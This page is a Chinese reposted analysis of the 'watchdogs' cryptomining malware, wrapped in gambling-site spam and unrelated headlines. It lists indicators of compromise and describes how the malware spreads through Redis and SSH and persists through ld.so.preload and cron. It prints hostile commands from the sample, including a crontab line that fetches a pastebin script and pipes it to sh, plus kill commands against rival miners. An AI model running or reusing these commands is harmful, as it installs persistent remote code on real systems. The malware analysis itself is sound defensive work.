太阳集团2138备用网址

  • 防弹少年团金泰亨蓝发登各国热搜 玩儿转红粉金黑棕各种发色实力演绎“有颜任性”【组图】 2019-04-25
  • 龙烨为袁竹逍遥画派配画诗欣赏之三 2019-04-25
  • 因应增值税下调 多个豪车品牌在华降价 2019-04-25
  • “小屏论”话两会:“习语”暖人心 2019-04-25
  • 低价 贴心 保障 国美3.15,为消费者保驾护航低价贴心保障 国美315,为消费者保驾护航-国美 2019-04-25
  • 中央政治局同志向党中央和习近平总书记述职 2019-04-25
  • China Daily Website 2019-04-25
  • 【守护好我们的美丽家园】新疆的明天一定会更好 2019-04-25
  • 22年后紫霞仙子归来 可至尊宝已经不是他了 2019-04-25
  • 【独家V观】你好 意大利 2019-04-25
  • 合肥一文化公司人去楼空老板跑路 老人购买保健品被骗上万元 2019-04-25
  • 北京二手房交易实现一网通办 20分钟就办完 ——凤凰网房产北京 2019-04-25
  • NBA史上最牛的9大名帅 波波在这里只能排倒三 2019-04-25
  • 《阿丽塔》要和《流浪地球》抢票房 2019-04-24
  • 百城住宅均价环比涨幅持续收窄 变化大多在1%内 2019-04-24
  • 欢迎来到 黑吧太阳集团2138备用网址 是业内专业的游戏平台,为你提供各式各样的精品游戏,最全的游戏项目,同时还为您提供各种游戏专题游戏攻略人气论坛。

    watchdogs挖矿木马综合分析报告

    来源:本站整理 作者:佚名 时间:2019-02-26 TAG: 我要投稿

    太阳集团2138备用网址 www.r-island.com 2019年2月21日晚,默安科技应急响应中心接到某合作伙伴的求助电话,针对被watchdogs病毒感染的机子进行排查和分析,并最终给出了针对该类型的挖矿病毒的清除工具,帮助客户清除病毒文件,修复被感染机子,挽回经济损失。经默安科技影武者实验室安全研究员分析发现,该病毒是通过Redis未授权访问漏洞及ssh弱口令进行突破植入,随后释放挖矿木马进行挖矿操作,并对内外网主机进行redis漏洞攻击及ssh暴力破解攻击。该病毒有以下几个特征信息:
    1、查看netstat命令是否被删除。
    2、查看/root/.ssh中的密钥信息是否被清除。
    3、查看计划任务,是否存在以下任务信息:
    curl -fsSL /Article/UploadPic/2019-2/2019226193954448.jpg -o /tmp/watchdogs||wget -q /Article/UploadPic/2019-2/2019226193954448.jpg -O /tmp/watchdogs
    4、使用busybox检查可以进程:
    busybox ps -ef|grep watchdogs
    busybox ps -ef|grep ksoftirqds
     
    如果包含则说明中毒。
    5、病毒程序执行后会消耗大量的主机cpu资源。
    请各位系统维护人员检查各自机子是否有以上特征,如果有以上特征,可联系默安科技安全应急响应中心获取病毒清除工具。
    下面对该病毒进行详细地分析。
     
    0x1 Watchdogs程序
    由于病毒程序使用golang编写的,做了一些混淆操作,ida无法识别其中的符号信息,需要手动修复一下,可使用以下idapython脚本进行修复,修复后可还原一部分方法名,便于之后的分析:
    https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro
    通过脚本还原符号信息,重命名了3946 个方法。
    修复前:

    修复后:

    下面分析主函数 main.main()
    Main函数中主要工作是:
    0x1 将wathdogs这个进程设置为系统服务
    0x2 将libioset写入到/etc/ld.so.preload中
    0x3 将写入定时任务,远程下载挖矿文件
    0x4 启动ksoftirqds进程进行挖矿操作
    0x5 删除tmp下ksoftirqds,watchdogs,config.json等文件
    0x6 更新程序
    0x7 redis未授权攻击及ssh暴力破解攻击

    由于控制流图太大,这里就不给出了,下面是main函数中的主要代码,已经做了详细的注释:

    将watchdogs添加为系统服务

    这里大概的意思是将libioset.so写入奥/etc/local/ld.so.preload。通过这种方式将libioset.so设置为预加载的动态链接库,这样即使程序不依赖libioset.so,libioset.so依然会被装载。

    这里是写入配置信息到文件/tmp/config.json中

    这里是写入定时任务(位于:github_com_hippies_LSD_LSDC_Cron函数中)

    通过查看计划任务发现。
    每15分钟执行一次更新下载操作:

    通过网页访问这个url发现其是一段base64加密的数据
     

    脚本内容分析如下:
    每15分钟从pastebin上下载经过base64编码的该脚本自身并写入到定时任务中:
    export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
    echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh" | crontab -
    关闭其他可能存在的挖矿木马:
    ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
    ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9

    [1] [2] [3] [4] [5]  下一页

    【声明】:太阳集团2138备用网址(http://www.r-island.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@www.r-island.com,我们会在最短的时间内进行处理。
    • 最新更新
      • 相关阅读
        • 本类热门
          • 最近下载